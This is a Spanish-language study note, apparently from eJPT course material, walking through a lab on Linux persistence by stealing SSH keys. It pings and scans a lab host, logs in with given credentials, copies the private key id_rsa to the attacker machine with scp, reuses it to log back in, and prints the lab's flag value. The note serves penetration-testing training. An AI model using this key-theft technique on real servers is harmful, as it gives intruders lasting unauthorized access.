> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/post-explotacion/persistencia/persistencia-en-linux/persistencia-mediante-claves-ssh.md).

# Persistencia mediante claves SSH

Linux se usa a menudo como **sistema operativo de servidor**, lo que implica acceso remoto casi siempre a través de **SSH**. Si durante una intrusión encuentras el servicio SSH activo, su configuración puede convertirse en tu pasaporte de **acceso persistente**.

***

### 🖥️ Por qué aprovechar SSH

* **Acceso remoto estándar**: casi todos los servidores Linux exponen SSH.
* **Autenticación por claves**: lo habitual es deshabilitar contraseñas y usar **llaves públicas** para mayor seguridad.
* **Persistencia limpia**: mantener una clave privada no genera procesos extra ni dispara alertas evidentes.

***

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/Jsq2n2W8kQUOy31GkL16" alt=""><figcaption></figcaption></figure>

**Paso 2:** Verifique si la máquina de destino es accesible:

**Dominio:**

```
ping -c 4 demo.ine.local
```

<figure><img src="/files/7aRU5I2eWrI3vlGI4836" alt=""><figcaption></figcaption></figure>

El objetivo es alcanzable.

**Paso 3:** Ejecute un escaneo nmap contra el objetivo:

**Dominio:**

```
nmap demo.ine.local
```

<figure><img src="/files/i0EuvKgp6GyfmokgqV81" alt=""><figcaption></figcaption></figure>

El puerto SSH está abierto.

**Paso 4:** SSH en la máquina de destino

Las credenciales de inicio de sesión de SSH se proporcionan en la descripción del desafío:

* Nombre de usuario: student
* Contraseña: password

**Comandos:**

```
ssh student@demo.ine.local
Enter password “password”
```

<figure><img src="/files/tHPP3sDPdAcOHrPwmqEU" alt=""><figcaption></figcaption></figure>

**Paso 5:** enumerar los archivos presentes en el directorio de inicio.

**Dominio:**

```
ls -al
```

<figure><img src="/files/9QcPPOvW9ZohYnfTT0yn" alt=""><figcaption></figcaption></figure>

El par de claves SSH está presente en el directorio “.ssh”.

**Paso 6:** Salga de la sesión SSH y copie la clave privada SSH a la máquina del atacante.

**Comandos:**

```
scp student@demo.ine.local:~/.ssh/id_rsa .
Enter password “password”.
```

<figure><img src="/files/TdHsWEpmqi50vWnZDNgl" alt=""><figcaption></figcaption></figure>

**Paso 7:** Ingrese a la máquina del estudiante mediante SSH y elimine el archivo de espera.

**Comandos:**

```
ssh student@demo.ine.local
Enter password “password”

rm wait
```

<figure><img src="/files/AbHaHRoE4uVEwtrH7IFC" alt=""><figcaption></figcaption></figure>

La sesión SSH ha finalizado.

**Paso 8:** Inicie sesión en la máquina de destino mediante SSH con la clave privada.

**Comandos:**

```
chmod 400 id_rsa
ssh -i id_rsa student@demo.ine.local
```

<figure><img src="/files/G6ojlYBV53obJqFnhWqg" alt=""><figcaption></figcaption></figure>

**Paso 9:** Recuperar la bandera.

**Comandos:**

```
ls -l
cat flag.txt
```

<figure><img src="/files/A1q2NPzefbt27o1UMm65" alt=""><figcaption></figcaption></figure>

**Bandera:** 689227a4f1b97afe1ff5ebaf85babc19

#### Conclusión

En este laboratorio, analizamos cómo podemos mantener el acceso en la máquina de destino después de modificar las credenciales mediante artefactos relacionados con SSH.

#### Referencias

* SSH
